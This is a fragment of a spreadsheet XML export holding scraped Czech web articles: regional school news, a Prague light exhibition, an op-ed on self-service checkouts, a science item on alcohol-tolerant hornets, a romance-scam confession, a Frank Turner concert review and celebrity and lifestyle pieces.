    <t>Shrnutí Střední školy na Vysočině nabídnou od září studentům tři nové obory Publikováno Od Karel Janovský Ilustrační foto KRAJ VYSOČINA – Gymnázium se sportovní přípravou, ošetřovatel a bezpečnostně právní činnost. To jsou názvy tří oborů, na které se mohou nově hlásit žáci devátých tříd na Vysočině. Podle hejtmana Vítězslava Schreka je vznik nových oborů reakcí na aktuální požadavky trhu práce i samotných uchazečů. Gymnázium Třebíč se zaměří na sportovní talenty. Na obor sportovní příprava škola přijme až šest desítek mladých sportovců. „Žáků s individuálními studijními plány, kteří sportují na reprezentační úrovni, přibývá a právě jim se snažíme vyjít vstříc. Po dohodě s místními kluby gymnázium nabídne zaměření na atletiku, hokej, fotbal, baseball, plavání, triatlon, tenis a basketbal,“ vyjmenoval radní kraje Vysočina Jan Břížďala . V souvislosti s novým oborem kraj počítá s modernizací budovy v blízkosti školy. Staňte se členy FB skupiny Život v kraji Vysočina a žádná zpráva vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Střední odborná škola a učiliště v Třešti rozšíří svou nabídku o možnost studia ošetřovatelství, s kapacitou třicet žáků. Důvodem zápisu tohoto oboru do školského rejstříku je vysoká poptávka o absolventy ze strany zdravotnických a pečovatelských zařízení. Škola se stane šestou v regionu, která umožní přípravu pro výkon této zdravotnické profese. Další školou v kraji, která ošetřovatele brzy zařadí do své nabídky, bude Střední průmyslová škola a střední odborné učiliště Pelhřimov . Pozor Aktualita: Drogy, alkohol a potupný konec. Manželství Fenina je konečně rozvedené Obchodní akademie a hotelová škola Třebíč přijme od září až 120 žáků na obor bezpečnostně právní činnost. Jeho absolventi najdou uplatnění například v bezpečnostních sborech, složkách IZS nebo ve veřejné správě. „Žáci budou připraveni na navazující studium na policejních akademiích nebo na vysokých školách zaměřených na bezpečnost a právo. Součástí výuky bude také problematika kyberbezpečnosti,“ doplnil Jan Břížďala s tím, že kraj je připraven v následujících měsících financovat úpravy tělocvičny tak, aby její vybavení vyhovovalo potřebám výuky nového oboru. Třebíčská střední škola nabídne tento obor jako druhá v regionu. Celý článek zde: ZDROJ ZDE ….✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Doporučujeme: Autor: Karel Janovský Autor person Karel Janovský</t>
  </si>
  <si>
    <t>20241101_210_3243796937_9bd27beb7b8820a12306.html</t>
  </si>
  <si>
    <t>9bd27beb7b8820a12306</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší fascinující vesmírný zážitek do Žlutých lázní</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší fascinující vesmírný zážitek do Žlutých lázní Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezoně název „Zvonkova cesta vesmírem.“ Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstava bude otevřena od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. Spojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelné parky „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Přijďte se ponořit do fascinujícího světa světla a objevte, jak neuvěřitelně krásný je nekonečný vesmír kolem nás! Autor: Simona Vondráčková Autor person Simona Vondráčková Rubrika transition_slide Nezařazené</t>
  </si>
  <si>
    <t>1570</t>
  </si>
  <si>
    <t>834000</t>
  </si>
  <si>
    <t>20241101_211_3243779827_2f9a76f9748f9d267028.html</t>
  </si>
  <si>
    <t>2f9a76f9748f9d267028</t>
  </si>
  <si>
    <t>Vnucování samoobslužných pokladen - nehorázné a&amp;nbsp;kontraproduktivní</t>
  </si>
  <si>
    <t>Vnucování samoobslužných pokladen - nehorázné a&amp;nbsp;kontraproduktivní Byl to šok, když jsem jako vždycky vešel u nás na sídlišti do prodejny Albert – a místo obvyklých pokladen spatřil jakýsi ohraničený prostor, v němž panoval očividný zmatek. Jasně, pokud jsou u pokladen fronty a někdo si přišel koupit minerálku a pytlík bonbónů, samoobslužnou pokladnu uvítá. Z hlediska zákazníka by tedy mělo jít o nabídku, alternativu. Realita (resp. moje zkušenost) je ale taková, že prodavačky nutí zákazníky, aby zajeli do boxu se samoobslužnými pokladnami. Samy to přiznávají. Je nařízeno, kolik procent nákupů musí být placeno „samoobslužkou“, někdy se stává, že není obsazena jediná pokladna s živou prodavačkou. Podezřele pak vyznívá tvrzení Jiřího Marečka, ředitele komunikace, že zákazníci oceňují rychlost či samostatnost při odbavení. Pan Mareček je buď mimoň, nebo bere účelově v potaz jen určitý fragment zákazníků za určitých podmínek. Předpokládám, že Albert není před krachem, že se nemusí zbavovat prodavaček a jejich práci přenášet na zákazníky. Ale pokud tomu tak je, rád si na prodavačku či prodavače u klasické pokladny připlatím. Procento z ceny nákupu? Za komfort a ušetřený čas by mi to stálo. Z nákupního vozíku vyndám zboží na pás, pozdravím paní prodavačku, která rutinně „načte“ jednotlivé položky, zaplatím, nandám zboží zpátky do vozíku, kus poodjedu a přendám do tašky. Hotovo, na shledanou! Místo toho jsem v podstatě vyděračsky nucen zaparkovat u některé ze „samoobslužek“ a podstoupit úkorný proces. Problém nastane už ve chvíli, kdy si uvědomím, že nemám brýle, a tedy nic nepřečtu. To mi pak jsou k ničemu všechny dovednosti, k nimž se mě „vstřícný“ supermarket snaží vycvičit: ohlásit, že jsem vracel prázdné láhve, potvrdit, že už jsem dost starý, abych si mohl dát pivo , správně označit počet rohlíků a druh zeleniny. Z nákupního vozíku vše vyndavat na pokladnu, odtud do přilehlého boxíku, z něj zpátky do vozíku, zaplatit, vymanévrovat z prostoru samoobslužných pokladen a teprve poté přendat nákup do tašky. Pravda je, že mně – pokud už jsem to z nezbytí absolvoval – pokaždé asistoval ochotný personál, spíš celou tu proceduru udělal sám. Jenže to mohl rovnou sedět za pásem u klasické pokladny. Bylo by to rychlejší a pohodlnější. „Jestli můžete, tak vzkažte těm vašim hlavounům, ať jdou s tímhle pokrokem do háje,“ povídám. „To nejste zdaleka sám, kdo tohle říká,“ dozvídám se. A pak třeba i to, že jsou ty „samoobslužky“ dost poruchové. Řešení problému se přitom nabízí: mít v provozu vždy dostatečné množství klasických pokladen, někde stranou pak dvě či tři pokladny samoobslužné pro menší nákupy. To bych jako zákazník ocenil. V poslední době jsem totiž začal stále více oceňovat něco jiného – vietnamské večerky.</t>
  </si>
  <si>
    <t>20241101_212_3243779426_c8aee148c9043209f7c6.html</t>
  </si>
  <si>
    <t>c8aee148c9043209f7c6</t>
  </si>
  <si>
    <t>Sršně se týden živily osmdesátiprocentním alkoholem. Přežily, neopily se</t>
  </si>
  <si>
    <t>Sršně se týden živily osmdesátiprocentním alkoholem . Přežily, neopily se Každý, kdo viděl první film s Indianou Jonesem Dobyvatelé ztracené archy, si na tu scénu určitě vzpomene. Indyho bývalá přítelkyně Marion v ní coby majitelka putyky kdesi v Nepálu soutěží s rozložitým místním borcem v pití pálenky. Na konci zápolení se hromotluk s úsměvem sesune k zemi. Pokud by se tvůrci filmu Steven Spielberg a George Lucas rozhodli natočit pokračování Indiana Jones v říši hmyzu a klání v něm zopakovat, k favoritům by nejspíš patřila sršeň východní. Vyplývá to z výzkumu skupiny vědců vedené Sofií Bouchebtiovou z Telavivské univerzity. Badatelé nabídli sršním stravu sestávající se pouze z cukerného roztoku s různými koncentracemi etanolu. Na začátku pokusu se jejich rozpětí pohybovalo od jednoho do dvaceti procent. Vědci se domnívali, že víc nebude potřeba. I živočichové zvyklí na konzumaci zkvašeného ovoce, jako třeba mušky octomilky, nezvládnou víc než čtyřprocentní alkohol . Odpovídá slabšímu pivu . Dvacet procent má například peprmintový likér, lidově zvaný „zelená.“ 9 fotografií Sršně neměly s dvacetiprocentním alkoholem problém. Výzkumníci proto zkoušeli koncentrace dál navyšovat. Ukázalo se, že hmyz se zvládá živit i osmdesátiprocentním alkoholovým roztokem. Navzdory vysoké koncentraci etanolu se choval úplně normálně. Látka, která je pro většinu živočichů včetně člověka psychoaktivní, neovlivnila jeho nervový systém. Nezpůsobila ani jeho zvýšenou úmrtnost. Emancipované pakobylky upřednostňují klonování. K čemu mají samečky, když je nepotřebují? Genetický průzkum ukázal, že všechny sršně, tedy nejen sršeň východní, mají ve své dědičné informaci dvě až čtyři kopie genu pro enzym alkoholdehydrogenázu. Slouží k rozkladu etanolu. Další druhy sršní by proto mohly být stejně nebo podobně odolné. Schopnost pozřít vysoce koncentrovaný alkohol a přežít nejspíš znamená evoluční výhodu. Sršně se mohou pustit do ovoce, které je pro ostatní hmyz nejedlé. Ve střevech sršní a jejich blízkého příbuzenstva navíc žijí kvasinky rodu Saccharomyces, které alkoholové kvašení způsobují. Dokonce se v útrobách hmyzu i rozmnožují. Nejspíš jde o oboustranně výhodný vztah. Kč Autor: Radek John Autor Radek John Rubrika transition_slide Orientace - Věda</t>
  </si>
  <si>
    <t>20241101_213_3243751183_827b2d44440e81c88d41.html</t>
  </si>
  <si>
    <t>827b2d44440e81c88d41</t>
  </si>
  <si>
    <t>Kristina (53): Hledala jsem lásku a naletěla podvodníkovi, který ze mě jen tahal peníze. Nechápu, že jsem byla tak hloupá</t>
  </si>
  <si>
    <t>Kristina (53): Hledala jsem lásku a naletěla podvodníkovi, který ze mě jen tahal peníze. Nechápu, že jsem byla tak hloupá Jak známo, není radno věřit neznámému člověku. Ale jak se říká, zoufalé ženy dělají zoufalé věci, a vůbec si to neuvědomují. A na rady nedají, protože ve chvíli, kdy se zblázní do chlapa, nevidí a neslyší. Zůstala jsem sama. Nestalo se to ze dne na den a nějaký čas jsem si v samotě libovala, ale jednoho dnes jsem se rozhodla to změnit. Ale jak se s někým, v mém věku, seznámit? Přes seznamku! Netušila jsem ale, že se bezhlavě zamiluju a kvůli tomu naletím podvodníkovi. Mohlo by Vás zajímat: Ludmila (37): Naletěla jsem podvodníkům z internetu. Při nákupu šatů jsem tak přišla o čtyři tisíce korun Na seznamce jsem si měla z čeho vybírat Začalo to tak, že jsem se svěřila kamarádce . „Nějak už se mi nelíbí být sama a řekla bych, že mám poslední šanci to změnit! Ale kde mám někoho potkat?“ Poradila mi, ať se přihlásím na nějakou seznamku . Moc se mi to nelíbilo, ale prohlásila, že je to dnes běžné. „Neboj se toho, co se může stát? V nejhorším si nevybereš, no…“ Takže jsem nakonec souhlasila a s její pomocí šla do toho. Byl jsem ráda, že na to nejsem sama. Tinder, který bylo první, co nás napadlo, se mi neosvědčil, takže jsem hledala jinde. Nebudu říkat, kde, protože se za to dneska stydím… Hned jakmile jsem se zaregistrovala, skočilo po mně snad padesát chlapů ! „Mám z čeho vybírat!“ zaradovala jsem se a hned si je začala prohlížet. Mohlo by Vás zajímat: Věra (49): Kamarádka se zamilovala do podvodníka. Snažila jsem se ji varovat, ale prý ze mě mluví závist Jeden chce to a druhý tohle Ne že by to bylo nějak snadné najít partnera , možná právě proto, že jich na mě vyskočilo až moc. Ale protože jsem musela zaplatit nějaký – a ne malý – poplatek, měla jsem v úmyslu chvilku si vybírat a nebála jsem se toho. S několika zájemci jsem si domluvila kávu, ale místo nadějí to bylo jedno velké zklamání. „Jeden z nich se mě ptal na plat, druhý na to, kam spolu pojedeme, třetí přišel rovnou s batohem, že by se asi přistěhoval,“ povyprávěla jsem kamarádce. A pak mi napsal Petr. Budeme mu tak říkat, i když kdoví, jak se doopravdy jmenoval. A já zjistila, že je o dobrých patnáct let mladší! No nejdi do toho! Mohlo by Vás zajímat: Šarlota (26): Krátce po seznámení s přítelem se mi začalo dělat špatně. Děsivé vysvětlení jsem našla až v bytě jeho ex Naletěla jsem jak malá holka Sešli jsme se s Petrem v parku . Bylo to tak romantické! Samozřejmě se mi hned zalíbil – vždyť mu nebylo ani čtyřicet! Slovo dalo slovo a pozval mě na druhý den na večeři do luxusního podniku, kam jsem toužila zajít, ale nebylo s kým. Večeře proběhla, víno teklo proudem a když přišlo na placení, práskl se do čela: „Promiň, já zapomněl doma peněženku!“ Tak jsem vytasila kartu a zaplatila skoro tři tisíce. Proč ne? Následoval báječný sex u mě doma a já byla blažená. A přišel měsíc úžasného sexu. Už bez večeří, ale co na tom? Kamarádka mi tiše záviděla. A pak, po jedné obzvlášť povedené sexuální hodince, pronesl Petr: „ Nepůjčila bys mi dvacet tisíc? Mám nějaké problémy ve firmě, vrátím ti to cobydup.“ A já půjčila, ovšem za týden si řekl o padesát a já mu je zase dala. Pořád jsem byla v klidu. Následoval prodloužený víkend , který jsem zaplatila já, s tím, že slíbil, že po neděli se srovnáme. Takže jsem mu věřila. A pak zmizel ze světa. Mobilní číslo samozřejmě neexistovalo a kde bydlí nebo jiné info jsem o něm neměla. Jak já byla hloupá! Tolik, že jsem se bála to komukoli říct. Kamarádce jsem řekla půl pravdy . Že mě nechal a ze seznamky se rychle odhlásila. I když mě napadlo, že bychom ho, kdybych se svěřila kámošce, možná mohli ulovit… Ale co z toho? Žádný papír o půjčce jsem neměla a bylo mi jasné, že mi bude klidně do očí lhát. Spolkla jsem slzy a slíbila si, že příště – bude-li nějaké – budu už moudřejší. Další příběhy ze života → Mohlo by Vás zajímat: Vanessa (18): Tlak na prestižní střední škole mě dostal na dno. Naštěstí mě zachránila kamarádka Text byl zpracován na základě skutečného příběhu, fotografie je jen ilustrační. Máte podobnou zkušenost? Svěřte se nám se svým příběhem, napište na redakce@lifee.cz . Vítejte u Hanky Kynychové: Jako první jsme navštívili nový dům, ve kterém má konečně vlastní šatnu Autor: Šárka Schmidtová Autor person Šárka Schmidtová</t>
  </si>
  <si>
    <t>20241101_214_3243776071_030a9a304a9950a74fcb.html</t>
  </si>
  <si>
    <t>030a9a304a9950a74fcb</t>
  </si>
  <si>
    <t>NAžIVO: Sympaťák Frank Turner v Praze zase jednou ukázal, proč ho v zahraničí tak milují</t>
  </si>
  <si>
    <t>NAžIVO: Sympaťák Frank Turner v Praze zase jednou ukázal, proč ho v zahraničí tak milují Frank Turner &amp;amp; The Sleeping Souls místo: Roxy , Praha datum: 31. října 2024 support: The Meffs, Skinny Lister setlist: No Thank You For The Music, Girl From The Record Shop, 1933, Recovery, Never Mind The Back Problems, Photosynthesis, Letters, Haven't Been Doing So Well, Plain Sailing Weather, If Ever I Stray, The Next Storm, Vital Signs, The Way I Tend To Be, Glorious You, Be More Kind, The Ballad Of Me And My Friends, I Knew Prufrock Before He Got Famous, Ceasefire, Do One, Try This At Home, I Still Believe, Somewhere Inbetween, Polaroid Picture, Get Better , Four Simple Words Fotogalerie © Vojta Florian / musicserver.cz Když si zpětně pročtete reportáže z předchozích koncertů Franka Turnera a jeho doprovodné kapely The Sleeping Souls , které jsme na musicserveru vydali při příležitosti jeho českých, ale i zahraničních vystoupení v minulých letech, měla by na vás dýchnout jednoznačná pointa. Ten chlápek je prostě skvělý - obrovský sympaťák se srdcem na dlani, písničkami o něčem a zkrátka člověk, který by se pro své publikum rozdal. Jeho punk-rockovou misí je rozdávat v nekompromisním a tvrdém světě lásku, slušnost a dostatek síly těm, kteří ji postrádají. Coby duchovní pokračovatel Bruce Springsteena maká každý koncert na tom, abyste z jeho show odcházeli naplnění a s nadějí, že už bude líp. A jak už to tak bývá, slušnost, noblesa a ryzí srdce se bohužel neprodává. Nechápejme se špatně, v Roxy byla kapacita sálu možná dokonce překročena, jak narváno tam bylo. Nemálo fanoušků se muselo smířit s mizerným výhledem na pódium, neboť do kotle se už nešlo dostat. Jenže takovou situaci známe už z roku 2018, kdy se Frank na stejném místě ukázal v Česku naposledy a podobným způsobem jako nyní se i v češtině představil. Jen se tehdy jednalo o koncert číslo 2279 , zatímco nyní se dostal už na číslovku 2965. Jubilejní koncert s číslem 3000 ho čeká příští rok v Londýně . Po takovém množství vystoupení po celém světě, při němž si nedávno vyzkoušel i málem sebevražednou tour po Státech, kdy noc co noc hrál v jiném státě USA , byste možná čekali, že dojde k upgradu například do Fora Karlín . Nedošlo. A jak ukázal i drobný výzkum v sociální bublině autora reportáže, lidé v Česku, kteří jinak poslouchají folk, punk i rock, jimiž je písničkář proslulý a patří tedy mezi jeho cílovku, na něj nechodí, protože ho vlastně vůbec neznají. Tak jednoduché to je. © Vojta Florian / musicserver.cz V České republice totiž došlo k podivuhodné situaci. Zatímco v Německu , Rakousku , Maďarsku , Polsku a dalších státech už více než dekádu patří Frank Turner k letním festivalům podobně jako slunce a pivo , neboť je naprosto ideálním festivalovým interpretem, v Česku si ho akorát před mnoha a mnoha lety pozvali pouze na Mighty Sounds. A od té doby ani ťuk. Pouze kluby. Jenže do nich si logicky kupují vstupenky jen ti dávno přesvědčení. Proto jste mohli i v Roxy slyšet od návštěvníků převážně němčinu. Zůstává nad tím rozum stát. Vždyť dvaačtyřicetiletý umělec by i se svou družinou očaroval návštěvníky jak na Rock For People, tak třeba na Colours Of Ostrava . Pracovat s publikem totiž umí jako málokdo. A jakmile by nepřekvapivě a zcela zaslouženě zazářil i před diváky dosud nepolíbenými jeho umem, dávno bychom se mohli bavit o tom, zda už mu zmiňované Forum Karlín není malé. Nepochopitelná situace. Mít jako promotér v ruce takový diamant a nevytěžit ho na maximum... © Vojta Florian / musicserver.cz Ale zpátky k dění na scéně. Po The Meffs si svůj irskou muzikou našlápnutý šraml rozbalili taktéž nedocenění Skinny Lister . Ty by návštěvníci ostravských Barev znát mohli, ostatně tamní Drive stage mají muzikanti velice dobře prošlapanou. Britové v lehce obměněné sestavě by si jistě zasloužili i delší čas než chabou půlhodinku, nicméně hlavní hvězda večera hrála takřka dvě hodiny, tudíž o pořádnou porci zážitků ani tak nebyla nouze. I tentokrát hrál Frank Turner s takovou vervou, že už po třetí písničce mohl ždímat košili a hledat ručníky. Lilo z něj tak moc, že musel co chvíli zavírat oči, aby mu do nich slaný pot z čela nestékal. Na plavbu na rukou publika se sice stejně jako posledně nevydal, ovšem jakmile tak učinili první rozdovádění fanoušci, muziku zastavil a okřikl zdejší sekuriťáky, že "by, sakra, měli začít dělat svou práci a přemístit se od bočních stěn do pitu a chytat plovoucí fanoušky, protože nechce, aby se na jeho koncertě někdo zranil" . Skladbu "Photosynthesis" proto musel restartovat, za což se omluvil, není však pochyb o tom, že byl v právu. To jeho jméno a bankovní konto by následně mohlo dostat ránu, kdyby včas nezakročil a neupozornil na to, že pracovníci klubu na místě nejsou jen pro parádu. Pomyslně tak naplnil slova svého vlastního refrénu o tom, že "si nesedne na zadek a nebude držet klapačku" . Jediný nepříjemný moment celého večera však zůstal vzápětí zapomenut, neboť se autor letošní, už desáté studiovky "Undefeated", kterou si určitě poslechněte a soustřeďte se u ní na to, jak krásně do jeho tvorby stále silněji promlouvá klavír, rozpovídal. Řada fanoušků tak dostala možnost se dozvědět, že singl "Somewhere Inbetween" pojednává o temných momentech, kdy se uprostřed noci probudí a bojuje s imposter syndromem. "The Ballad Of Me And My Friends" zase tvrdě, ale trefně popisuje časy, kdy se poflakoval v severním Londýně , chlastal a hulil s kamarády a doufal, že se mu jednou podaří prorazit. © Vojta Florian / musicserver.cz Vyloženě památná historka se ale vztahuje k novince "Letters". "V devadesátkách jsem jako teenager jezdíval na tábory. Nosil jsem tehdy mikinu s nápisem Korn a na jednom z nich jsem se seznámil s holkou, která pro změnu měla mikinu s nápisem Pennywise . Okamžitě to zaklaplo, ukázala mi, o čem je punk-rocková muzika, a tři roky v kuse jsme si pak v průběhu roku dopisovali a posílali mixtapy na kazetách třeba s Minor Threat a dalšími kapelami. A pak s tím náhle přestala a už jsem o ní nikdy neslyšel. A teď - před pěti měsíci - se mi ozvala! Napsala mi e-mail, jen aby se mě zeptala, jestli je písnička "Letters" o ní. Tak si říkám: 'To je fajn o tobě zase slyšet - po osmadvaceti letech!'" dodal trochu uštěpačně asi jen na oko dotčený interpret. Potěšil ale i silnými hudebními momenty. Krásně melodickou vyhrávku na mandolínu "The Way I Tend To Be" doprovodil procítěným vokálním výkonem, z nového alba se blýskla perla "Ceasefire" o hádce se svým patnáctiletým já s gradujícím instrumentálním finišem, jenž se stal vrcholem večera. Tehdy do kytary řezal tak, že tím připomínal dokonce i koncerty Biffy Clyro . V jinak velice šikovně a bohatě seskládaném setlistu chyběla snad jen oblíbená skladba "Mittens". A samozřejmě - srdečná atmosféra z jeho show nikam nezmizela. Publikum mávalo, po jeho vtipném, ale i láskyplném projevu u přídavku dle požadavku skákalo, dělalo cicrle pity, zpívalo a svému oblíbenci od začátku do konce viselo na rtech. Nezbývá než doufat, že už nyní se plánuje jeho příští česká zastávka. O takových koncertech je totiž radost psát. Autor: prolidi.cz Rubrika transition_slide Naživo</t>
  </si>
  <si>
    <t>10650</t>
  </si>
  <si>
    <t>21420</t>
  </si>
  <si>
    <t>20241101_215_3244032780_6684fe75925d427ec610.html</t>
  </si>
  <si>
    <t>6684fe75925d427ec610</t>
  </si>
  <si>
    <t>Langmajer přiznal krizi, dohnala ho impotence, vyzrál na ni však chytře technikou, jež zvládne každý muž</t>
  </si>
  <si>
    <t>Langmajer přiznal krizi, dohnala ho impotence, vyzrál na ni však chytře technikou, jež zvládne každý muž close Profimedia Meda Nováková 1. 11. 2024 clock 4 minuty Jiří Langmajer byl dříve pořádný proutník. Jeho kouzlu propadla celá řada známých žen. Vše se změnilo až v době, kdy se zamiloval do své současné manželky Adély Gondíkové . Oblíbená moderátorka a herečka žije s Langmajerem už patnáct let. Osmapadesátiletý herec neměl o zájem žen nikdy nouzi. Jiří Langmajer okouzlil známé herečky i modelky. Románek měl například s Petrou Faltýnovou či Mášou Málkovou . I přesto přišlo pro herce období, kdy si jako muž přestal věřit. Strach z impotence Jiří Langmajer se přiznal, že měl v minulosti strach, aby neselhal jako muž. I tak zkušený proutník, jako byl dříve tento charismatický herec, měl strach ze selhání při intimních chvílích. Oblíbený herec si našel v posledních letech zálibu ve zdravém životním stylu. Pravidelně se otužuje a chodí do sauny. Mimo to si oblíbil i užívání hned několika doplňků stravy. „Kolem padesátky jsem měl takové období, kdy jsem začal pochybovat sám o sobě a tím začalo pochybovat celé moje tělo. Měl jsem pocit, že už se mi nikdy nepostaví. Někdo mi doporučil, že existuje hormonální jóga, při které se vtahuje konečník a celé se to posiluje. Tak jsem si objednal cvičitelku. A zabralo to. Teď už mám na to jenom takový prášky. To ty ani nevíš,“ práskl na sebe v pořadu 7 pádů Honzy Dědka před svou ženou Adélou Gondíkovou , která byla z této informace poněkud zaskočená. „Byl jsem v Ostravě točit sKORONAmizině a tam mi řekli, že jsou tam nějací kluci, kteří udělali velmi ceněný produkt pro muže a pro ženy. Tobě jsem to přinesl taky a ještě jsi nesnědla ani jeden! Je to pro ženy těsně před přechodem. Já to jím pravidelně, protože si myslím, že mi to pomůže, jako ostatně asi dalších 40 pilulek denně. Dělá mi to radost, čím jsou barevnější, tím větší radost mi to dělá,“ přiblížil oblíbený herec. Tuto jeho zálibu následně rozvedla i samotná Adéla . „On má opravdu strašné množství léků a tvrdí, že jsou přírodní. Kupuje to ve velkém. Teď najel na čaje. Tak nám teď pořád domů někdo vozí nějaké balíky. Vypadá to jako pytle od sena. Přesypává si to do dóziček a nadepisuje si je podle účelu,“ práskla na svého manžela Gondíková . close Jiří Langmajer a Adéla Gondíková . Boj s démony Ne vždy žil Langmajer ukázkovým životem. Byl králem večírků a prošel si hned několika krizemi. První z nich byla finanční, do které se dostal kvůli tomu, že musel podstoupit operaci páteře a několik měsíců tak nemohl pracovat. „Měl bych se ještě dávat měsíc dohromady, ale copak si to můžu dovolit? Tři měsíce jsem nevydělal ani korunu. Dělám všechno, abych to zvládl," vzpomínal. Po finanční krizi přišly další problémy. Herec holdoval ve velkém alkoholu a propadl depresím. „Bylo to se mnou k nežití, moc jsem všechno prožíval, musel jsem vyhledat odbornou pomoc. Nechtěl jsem o ni přijít, věděl jsem ale, že se se mnou nedá žít," přiznal otevřeně v rozhovoru pro DVTV s tím, že se rozhodl vyhledat odbornou pomoc kvůli své současné ženě Adéle Gondíkové . „Tuhle ženskou mi přinesl pánbůh. Dostal jsem ji jako dar. Jsem pánubohu vděčnej, že jsem ji potkal. Díky ní jsem si uvědomil, že způsob, jakým žiju, je pro mě smrtelný. A že to chci změnit. Že to jde. Radovat se ze života, mít domov, tak nějak se uzemnit. Můj život změnila naprosto zásadně,“ uvědomoval si. „Nebyl jsem ani zdaleka v takový psychický kondici, kterou by si ta úžasná žena po mým boku zasloužila. I když bylo rozhodnutí vyhledat pomoc nevyhnutelný, provázel ho pocit vnitřní prohry. Doktor mi tehdy naštěstí velmi rychle vysvětlil, že deprese je nemoc jako každá jiná a jako takovou je třeba ji léčit. Stejně jako třeba léčíte vysokej krevní tlak nebo problémy se štítnou žlázou,“ přiblížil v rozhovoru pro Biorganica. Jiřímu Langmajerovi se povedlo zcela změnit svůj život. Adéla Gondíková si svého manžela nemůže vynachválit. „Dokáže o ženu tak krásně pečovat a dennodenně jí dává najevo, že ona je ta jediná na světě. Každá žena potřebuje být obletována, milována a ráda slyší, že jí to sluší, že je hezká. A na to Jirka nikdy nezapomíná,“ nešetří komplimenty na svého partnera populární herečka a moderátorka. Související články Rubrika transition_slide Celebrity</t>
  </si>
  <si>
    <t>11310</t>
  </si>
  <si>
    <t>11000</t>
  </si>
  <si>
    <t>20241101_216_3243733742_4dd3efa2005a27b7c191.html</t>
  </si>
  <si>
    <t>4dd3efa2005a27b7c191</t>
  </si>
  <si>
    <t>Když se životní styl stane uměním prostě přežít s úsměvem na rtu</t>
  </si>
  <si>
    <t>Když se životní styl stane uměním prostě přežít s úsměvem na rtu autor: Redakce Nezdrave.cz | 01.11.2024 | Kecy Co vlastně znamená žít naplno a užívat si každého okamžiku? Ve světě, kde se neustále honíme za úspěchem a materiálním bohatstvím, se může zdát, že skutečné štěstí leží za hranicemi normy. Někdo říká, že klíčem k plnohodnotnému životu je nebrat se příliš vážně, a ukazuje nám, jak žít v chaosu městského banketu. Dovolte mi vás zavést do fascinujícího světa, kde se každý den stává dílem surrealistického umění a hledání smyslu je především o osobním pohledu. Že je sobota, a co s tím? Víte, že průměrný Čech tráví víc času na sociálních sítích než v reálném životě? Jo, to je fakt, který by mohl i ten největší hipster naštvat, protože jak jinak by se mohl pochlubit tou perfektní fotkou brunchového talíře? Ten brunch, mimochodem, v sobě zahrnuje všechno od avokádové pomazánky po houby na másle – a je prý sakra důležitý pro naši duší. Ale víte co? Je v pořádku, že si v neděli na stolu vyložíte šampaňské místo pomerančového džusu, když život je stejně tak drahý jako dobré víno . Žijeme v době, kdy se spousta lidí snaží nazvat se bohémy od snídaně po večeři, přičemž jejich každodenní rutina vypadá jako scénář nepovedené komedie. Dny plynou rychlostí blesku, jeden víkend za druhým a vy se pořád cítíte jako byste nesnášeli „dovolenou doma“. Ale co kdybychom se na to podívali 